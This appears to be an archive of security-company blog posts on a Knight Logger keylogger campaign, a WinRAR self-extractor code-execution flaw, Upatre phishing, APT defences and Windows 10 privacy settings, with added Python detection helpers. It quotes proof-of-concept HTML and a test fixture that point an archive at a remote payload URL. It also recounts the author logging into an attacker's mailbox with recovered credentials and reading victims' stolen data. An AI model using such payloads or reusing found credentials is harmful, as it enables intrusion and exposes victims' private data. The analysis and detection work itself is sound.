I ran across an interesting piece of keylogging malware that uses a pre-built keylogger named Knight Logger. This particular keylogger is openly available for purchase online from its author. Of course it’s labeled for educational purposes only and says you must have the computer owner’s permission to install the keylogger. It also boasts a 0/39 AV engine detection rate, the ability to recover passwords, and the ability to provide “screenshoots” of the computer.


The original message was a 903 KB rar file with the exe inside claiming to be from HSBC. This is a rather large file size for malware, given that our average is probably closer to 60 KB for most malware. When uncompressed it comes in at around 1.2 MB. Upon execution, the malware gets its external IP address from 4 different external websites. These websites are pretty popular with malware since they can make a simple external HTTP request and get their external IP back in plain text. This lookup appears to be repeated every time the malware sends out data, most likely to make sure the IP stays up to date for anyone roaming.



For actually sending out data, the malware sent a plain text email every couple of minutes. This email contained a plain text file of keylogging and a full jpg screenshot of what was on the screen at the time.


So this is where things get sort of interesting and lazy on the attacker’s part. During the exfiltration of your data, it logs in to the remote SMTP server. It logs in using a base64-encoded username and password. The password I do feel like sharing because it was pretty bad. You can see the bad guy’s email is info@<redacted>. His password was info1234. At least there’s a login, I guess, only slightly better than an open relay. And once logged in, as I mentioned, it then proceeds to send the data in plain text (base64-encoded attachments). I wanted to see if the mail server was still up and running a little bit after I had run the malware. A lot of the time, within an hour or so, we see servers taken down when they are involved in these types of schemes. So I grabbed the login info, decoded it and tried to connect to the server. The server was indeed still up and the authentication was a success.

So I noticed on the SMTP transaction that the login address, FROM, and TO were all the same email address. On a hunch, I fired up Thunderbird and dropped in the username and password, expecting nothing really. But oh no, not this time. The credentials they are using to log in to the mail server also work for a POP connection to the actual destination mailbox the malware sends to. Thunderbird proceeded to download the messages from victim computers with the keylogged data and screenshots (or as Knight Logger says, “screenshoots”). This was something I didn’t expect to actually work and makes me think this whole thing was thrown together by someone with not too much thought put into it. They grabbed an available keylogger online and created a wrapper around it to just hopefully get it running on the victim’s computer.
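As an added illustration (my code, not part of the original post or of Knight Logger), here is a small Python parser for a captured SMTP session of the kind described above. The transcript is constructed: the mailbox name and host are placeholders (the password is the one quoted in the post), and the base64 values are simply the encodings of those placeholders. It shows why AUTH LOGIN hands an analyst the credentials straight from a packet capture, and it flags the login/FROM/TO-all-one-mailbox pattern and the screenshot-plus-keylog attachment pair.

```python
import base64
import re

# Constructed transcript of one exfiltration session (C: client, S: server).
# Mailbox and host are placeholders; the base64 lines encode those placeholders.
SAMPLE_SESSION = """\
C: EHLO victim-pc
C: AUTH LOGIN
S: 334 VXNlcm5hbWU6
C: aW5mb0BleGFtcGxlLmludmFsaWQ=
S: 334 UGFzc3dvcmQ6
C: aW5mbzEyMzQ=
S: 235 2.7.0 Authentication successful
C: MAIL FROM:<info@example.invalid>
C: RCPT TO:<info@example.invalid>
C: DATA
C: Content-Type: image/jpeg; name="screenshot.jpg"
C: Content-Type: text/plain; name="keylog.txt"
C: .
"""


def parse_session(transcript):
    """Pull credentials, envelope addresses and attachment names out of a transcript."""
    info = {"username": None, "password": None, "mail_from": None,
            "rcpt_to": [], "attachments": [], "auth_success": False}
    lines = transcript.splitlines()
    for i, line in enumerate(lines):
        if line == "C: AUTH LOGIN":
            # The next two client lines answer the 334 Username:/Password: prompts.
            # AUTH LOGIN is base64, not encryption, so both decode directly.
            answers = [l[3:] for l in lines[i + 1:i + 6] if l.startswith("C: ")][:2]
            if len(answers) == 2:
                info["username"] = base64.b64decode(answers[0]).decode("utf-8", "replace")
                info["password"] = base64.b64decode(answers[1]).decode("utf-8", "replace")
        elif line.startswith("S: 235"):
            info["auth_success"] = True
        elif (m := re.match(r"C: MAIL FROM:<([^>]*)>", line)):
            info["mail_from"] = m.group(1).lower()
        elif (m := re.match(r"C: RCPT TO:<([^>]*)>", line)):
            info["rcpt_to"].append(m.group(1).lower())
        elif (m := re.search(r'name="([^"]+)"', line)):
            info["attachments"].append(m.group(1))
    return info


def assess(info):
    """Turn the parsed fields into the three observations the post makes."""
    findings = []
    if info["auth_success"] and info["username"] and info["password"]:
        findings.append("credentials recoverable from capture: AUTH LOGIN is only base64")
    if info["mail_from"] and info["username"] == info["mail_from"] \
            and info["rcpt_to"] == [info["mail_from"]]:
        findings.append("login, MAIL FROM and RCPT TO are all the same mailbox")
    exts = {a.rsplit(".", 1)[-1].lower() for a in info["attachments"]}
    if {"jpg", "txt"} <= exts:
        findings.append("screenshot plus keylog text attachment pair")
    return findings
```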


Data is king when it comes to the dark belly of the internet these days. With a successful attack like this using a keylogger, who knows how long these users’ personal information would be exposed. Having up-to-date AV software and network protection can help prevent these types of attacks from playing out. Or, in the case of software built to evade AV, it can only evade for so long. Having the tools and pieces in place to monitor computers and traffic can help detect what might have otherwise gone unnoticed.

By Rocco Donnino, AppRiver

Once primarily used for espionage on governments and militaries, advanced persistent threats (APTs) are growing and targeting a new variety of organizations. Many companies are bolstering their online security, as evidenced by the $985 million organizations spent on advanced threat detection in 2014, according to recent research from Gartner*.


AppRiver offers three tips to help keep your organization safe from APTs:

  1. Cloud-based security solutions with real-time threat updates can help ensure that your organization is protected from the most recent threats. If your security software is only updated once per hour, then your network is vulnerable to the most recent APT attempts during that time. And given the message that a name like “advanced persistent threat” carries, waiting for a security update or patch is not ideal.  AppRiver’s SecureSurf™ Web Protection, for example, is updated thousands of times daily and based on malware trends from millions of sources.
  2. While email spam and virus protection will block most malicious emails, the savviest APTs out there will deliver a payload that is not executable via email. Instead, they will have a link to a malicious website. This is where adopting a layered security approach comes into play. For example, AppRiver’s email spam and virus filtering solution, SecureTide™, blocks more than 99 percent of malicious emails. However, if an email with a rogue URL were to sneak past us, then AppRiver’s SecureSurf would use intelligent DNS to block the malicious website. However, if it were a malicious link on a reputable site, like a malvertisement on Yahoo, SecureSurf using an adaptive proxy (which is also recommended by Gartner) would then block only the malicious advertisement while allowing the user to safely browse Yahoo.
  3. Most APTs have the aim of running quietly in the background while sending out information from your network over time, which is what makes advanced threat notifications so imperative for triaging a successful APT attempt. When looking for the advanced threat notification that’s right for your organization, look for a solution that will alert you if a malicious program is attempting to send out information from within your network. This warning can save your business from public reputation damage and costly penalties if any personal information was compromised. It should also provide immediate notification of advanced persistent threat activity so that network administrators can locate and quickly remediate affected endpoints.

* Pingree, L., MacDonald, N., Firstbrook, P. (4 May 2015). Best Practices for Detecting and Mitigating Advanced Persistent Threats. Gartner Research.

By Michael Imlay

Windows 10 is a step toward more personal computing and toward a world that is more mobile. As customers and partners embark on the Windows 10 journey, we thought it might be useful to list some of the issues we’re hearing about and discuss viable workarounds.


  • Forced Automatic Updates for Windows 10 Home Edition

Windows 10 Home Edition has automatic updates that cannot be disabled, while Windows 10 Professional Edition allows you to defer updates up to a few months, after which they will be installed automatically.

You can only uninstall/disable updates/upgrades after they have been installed, and you cannot choose to simply skip an update, even for apps from the Windows Store. This has both good and bad implications. The good implication is that, from a security standpoint, your system will always be up to date with the latest security updates and patches. However, in some cases updates can break systems and cause issues, and you’ll be the guinea pig. For example, Windows 10 pushed an update for nVidia drivers which caused many systems to become unbootable and left many users having to reinstall Windows. There was also a security update that was pushed out which caused many users to get stuck in a “boot loop”, unable to boot into Windows. However, even with the minor downsides to forced updates, overall this is going to make your system much more secure for all users, as all security patches will be pushed to your system, allowing Microsoft to quickly roll out fixes and preventing your system from becoming compromised. In the past, many users did not install updates on previous versions of Windows, which put their system, and others, at risk. This changes all that.

You can set up Windows Update to prompt you to restart instead of restarting automatically, as well as enable the “Defer upgrades” option. You can do this by going to Start/Settings/Update and Security/Windows Update/Advanced Options.


  • Cortana Comes with Strings

Under the default “Express” settings, Windows 10 is configured to send various information to Microsoft and other parties, including the collection of user contacts, calendar data, and “associated input data” to personalize “speech, typing, and inking input,” typing and inking data to improve recognition, allowing apps to use a unique “advertising ID” for analytics and advertising personalization (functionality introduced by Windows 8.1) and allow apps to request the user’s location data and send this data to Microsoft and “trusted partners” to improve location detection (Windows 8 had similar settings, except that location data collection did not include “trusted partners”).

Users can opt out of most of this data collection, but telemetry data for error reporting and usage is also sent to Microsoft, and this cannot be disabled on non-enterprise versions of Windows 10. The use of Cortana also requires the collection of data “such as your device location, data from your calendar, the apps you use, data from your emails and text messages, who you call, your contacts and how often you interact with them on your device” to personalize its functionality. The Microsoft Services Agreement states that the company’s online services may automatically “download software updates or configuration changes, including those that prevent you from accessing the Services, playing counterfeit games, or using unauthorized hardware peripheral devices.”

Critics interpreted this statement as implying that Microsoft would scan for and delete pirated software installed on devices running Windows 10. Additionally, Windows 10 has a feature, enabled by default, to share WiFi passwords to your contacts. This means that if you connect to your personal WiFi network at home, your WiFi password is shared with all your contacts so if they visit your home, their Windows 10 system will automatically connect to your network, without ever providing them the WiFi password. This could pose a security risk.

However, do not fear! Thankfully, Microsoft has provided a dedicated privacy section under settings which allows a user to disable most of these settings. You can access these settings by going to start/settings/privacy. Additionally, you can also disable WiFi Sense (so that your networks/passwords aren’t shared with your contacts) by going to Settings > Network & Internet > Wi-Fi > Manage Wi-Fi settings. In here, you basically want to disable every option you see, as well as tell Windows 10 to forget any Wi-Fi networks you’ve signed into in the past.


  • Windows 10 Driver Model

Windows 10 introduces the new WDDM 2.0 driver model, including DirectX 12 (which is a Windows 10 exclusive for gamers). This is overall a better driver model, and as long as your hardware is supported in Windows 10, there shouldn’t be any issues upgrading. However, many devices are unsupported, or have issues under Windows 10 with the new driver model. As an example, I attempted to upgrade my work laptop (Dell Latitude) to Windows 10. However, there is an issue with the video drivers under Windows 10 that prevents me from using my 3rd monitor. I spent countless hours trying to get the 3rd monitor to work, but ended up having to revert back to Windows 8.1. At home, my HP Photosmart D110 was unstable under Windows 10: the printer would work, but the scanner function wouldn’t. Additionally, my GeForce GTX 980 Ti video card (a new $700 video card) was initially listed as unsupported with Windows 10 upon release (although this has now been fixed). So, a key point here is to make sure your hardware is fully supported and to always have a fallback option in case something turns out to be unsupported that isn’t known yet.

  • New Start Menu Limitations

If you are a power user and have a lot of applications installed, it may break the new start menu. If you have over 500 items in your start menu, it will break it.

  • Distributed Update System

As Windows 10 automatically downloads updates to your system, Windows 10 is also sharing those updates with other computers on your network and on the internet. This poses a security concern, as it works much like a torrent system does and other users’ computers are downloading updates directly from your system. As your system shares these updates, it may slow your internet connection down, and many ISPs, such as AT&T, Mediacom, and Cox, have bandwidth limits in place, so this feature is causing many users on metered connections to face overage charges.

However, you can disable, or change the update system by going to Start/Settings/Update and Security/Windows Update/Advanced Options/Choose how updates are delivered. From here, you can disable the Distributed Update System completely, or only enable it for devices on your own network.


  • Windows 7/8.1 users are being “forced” to upgrade to Windows 10.

If you have automatic updates enabled, Microsoft is downloading Windows 10 to your computer, even if you didn’t opt in for the Windows 10 upgrade. This is causing many people to see a loss of free disk space (3.5 GB to 6 GB) because of this download, as well as to face overage charges on metered connections.

Researchers at Vulnerability-Lab have discovered an issue in WinRAR software that allows remote code execution via self-extracting exe files. Self-extracting archives (SFX files) are executable files that contain the necessary code to extract a file without needing an extractor pre-installed. So you could send someone one of these self-extracting files without needing to worry about whether they have something like WinRAR or 7zip installed already. This can be convenient when dealing with external clients where you may not know what software they have.



This issue that was discovered has to do with the display text section of the SFX file when opened. The text section supports HTML and can remotely retrieve that HTML info needed. In the proof of concept provided by Vulnerability-Lab, that HTML could point to a server containing malicious executables and WinRAR will download and execute the remote file.


Simple HTML like this in the text window could point to the server containing malicious code to be executed:

<html><head><title>poc</title><META http-equiv="refresh" content="0;URL="</head></html>

Something I noticed that did work with these was to use the WinRAR option of right clicking to extract the file. This prevents opening the display window where the malicious HTML may be lurking and simply extracts the original file. But that of course doesn’t mean the extracted file is safe.




Since the HTML is interpreted as soon as the SFX file is opened, no other user interaction is required for the vulnerability to be exploited. The original file that was archived doesn’t even need to be extracted. Simply opening the file is enough. I was able to recreate this pretty simply, so this could be something we will see in the future in malware campaigns. Since the SFX file still carries an exe extension, hopefully most users will already be cautious enough of unknown exes to know not to open it. This is certainly a prime example of why unknown attachments should be avoided.
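An added heuristic scanner (my code, not WinRAR’s or Vulnerability-Lab’s) for the pattern described above: it searches an SFX .exe for display-text HTML whose meta refresh points at a remote URL, which is the moment the archive reaches out to the network. It assumes the display text sits uncompressed in the file so a byte-level search finds it; the sample blob and the host name in it are constructed placeholders.

```python
import re

# Any <meta ...> tag, then whether it is a refresh and where it points.
# The PoC used uppercase META and URL=, so every pattern is case-insensitive.
META_TAG = re.compile(rb"<meta\b[^>]*>", re.IGNORECASE)
IS_REFRESH = re.compile(rb"http-equiv\s*=\s*[\"']?\s*refresh", re.IGNORECASE)
TARGET = re.compile(rb"url\s*=\s*[\"']?\s*([^\"'>\s]+)", re.IGNORECASE)


def find_refresh_targets(blob):
    """Return the URL of every meta refresh found in the raw bytes."""
    targets = []
    for tag in META_TAG.finditer(blob):
        if IS_REFRESH.search(tag.group(0)):
            m = TARGET.search(tag.group(0))
            if m:
                targets.append(m.group(1).decode("latin-1"))
    return targets


def classify(url):
    """'remote' means the SFX will reach out over the network as soon as its
    text window is shown; 'local' is a file already on disk."""
    u = url.lower()
    if u.startswith(("http://", "https://", "ftp://", "\\\\", "//")):
        return "remote"
    if u.startswith("file:") or re.match(r"^[a-z]:\\", u):
        return "local"
    return "other"


def scan_sfx(blob):
    """List (url, class) for each refresh target; any 'remote' entry is the
    pattern Vulnerability-Lab described."""
    return [(u, classify(u)) for u in find_refresh_targets(blob)]


# Constructed stand-in for an SFX .exe: PE magic, some binary filler, then a
# text window modelled on the proof-of-concept HTML. The host is a placeholder.
SAMPLE_SFX = (b"MZ\x90\x00" + bytes(range(256))
              + b"<html><head><title>poc</title>"
              + b'<META http-equiv="refresh" content="0;URL=http://placeholder.invalid/payload/">'
              + b"</head></html>" + b"Rar!\x1a\x07\x00")
BENIGN_SFX = b"MZ\x90\x00" + b"<html><body>Thanks for installing.</body></html>"
```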

This morning we’ve been seeing yet another offering from the Upatre guys. This time it comes in with a rather lengthy, by comparison, email with the subject line “Attorney-client agreement”. This story line certainly leaves out a few major details as it begins with a lawyer apparently already in court fighting against some sort of breach of contract suit against the recipient. The opening paragraph even forgives the intended targets for missing court this morning, citing that the court “understood”. This must come as a real shock to those of us who don’t keep a lawyer on retainer and those who didn’t realize they were being sued. It probably would’ve been really nice of this mystery lawyer to let you know that this was going on before it got to this point, I would think.


Regardless, the email goes on to give a vague report on what happened in court that day and a few things that the new defendant can expect as this fake lawsuit unfolds. This is a very classic, although slightly long-winded, social engineering technique employed by cyber thieves to raise a little fear and a lot of curiosity in their victims, which will then hopefully entice them into falling for the ruse. The payload in this attack lives in an accompanying attachment. Each of these attachments is quasi-randomly named by stringing together three different words from an apparent wordlist supplied by the command and control server. This randomization makes it slightly harder to nail down these files, simply because one cannot block based on the filename alone. Otherwise, it’s business as usual when it comes to stopping these nuisances.


One interesting detail about this line of attacks is that they seem to be targeting older, out of date PCs. After running the samples on a couple different operating systems, they only seemed to want to carry out their malicious intent on machines running Windows XP (I was using SP3). On newer versions it would shut itself down almost immediately after execution. Once operational though, this malware begins to hijack system processes to get a foothold on its new victim. It then reaches out to check its IP address and then looks to communicate with the IP on port 12299 where it reports back with information about the new target such as the IP it had just looked up and the computer name. Following this, the malware adds a good number of registry entries dealing with security certificates, mostly disallowing them and peeks around for debugging tools.

Even on Windows XP these samples seemed a little rickety, as they tended to crash after a fairly short period of time, but they did have the best success rate on the XP machines. I wouldn’t be surprised, though, if this little issue is quickly resolved and we start seeing the next campaign from these guys within the day. Seeing several different themes from this particular family of malware has been commonplace and has been happening on a daily basis for quite some time now.

AppRiver’s SecureTide has everyone covered though as we’re blocking these preemptively to help keep your machines happy and healthy.